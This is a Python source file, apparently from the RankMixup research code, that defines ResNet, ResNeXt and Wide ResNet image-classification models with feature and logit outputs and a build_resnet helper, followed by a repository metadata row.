# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0)
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0)
def _make_layer(self, block, planes, blocks, stride=1, dilate=False):
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x):
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
if self.has_dropout:
x = self.dropout(x)
x = self.fc(x)
return x
def forward(self, x):
return self._forward_impl(x)
def forward_feature(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
return x
def forward_feature_logit(self, x):
feature = self.forward_feature(x)
if self.has_dropout:
logit = self.dropout(feature)
else:
logit = feature
logit = self.fc(logit)
return feature, logit
def _resnet(arch, block, layers, pretrained, progress, **kwargs):
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict, strict=False)
return model
def resnet18(pretrained=False, progress=True, **kwargs):
r"""ResNet-18 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def resnet34(pretrained=False, progress=True, **kwargs):
r"""ResNet-34 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def resnet50(pretrained=False, progress=True, **kwargs):
r"""ResNet-50 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def resnet101(pretrained=False, progress=True, **kwargs):
r"""ResNet-101 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,
**kwargs)
def resnet152(pretrained=False, progress=True, **kwargs):
r"""ResNet-152 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,
**kwargs)
def resnext50_32x4d(pretrained=False, progress=True, **kwargs):
r"""ResNeXt-50 32x4d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def resnext101_32x8d(pretrained=False, progress=True, **kwargs):
r"""ResNeXt-101 32x8d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def wide_resnet50_2(pretrained=False, progress=True, **kwargs):
r"""Wide ResNet-50-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def wide_resnet101_2(pretrained=False, progress=True, **kwargs):
r"""Wide ResNet-101-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def build_resnet(
encoder_name="resnet50",
num_classes=2,
pretrained=True,
has_dropout=True,
has_batchnorm=True,
) -> nn.Module:
"""
Args:
encoder_name (str, optional): [description]. Defaults to "resnet50".
num_classes (int, optional): [description]. Defaults to 2.
pretrained (bool, optional): [description]. Defaults to True.
checkpiont (bool, optional): checkpoint path.
Returns:
nn.Module: [description]
"""
# from torchvision import models
# model = models.resnet50(pretrained=pretrained)
norm_layer = nn.Identity if not has_batchnorm else None
model = eval(encoder_name)(
pretrained=pretrained,
has_dropout=has_dropout,
norm_layer=norm_layer
)
model.fc = nn.Linear(model.fc.in_features, num_classes)
return model
| 15,882 | Python | .py | 334 | 38.461078 | 107 | 0.633894 | cvlab-yonsei/RankMixup | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.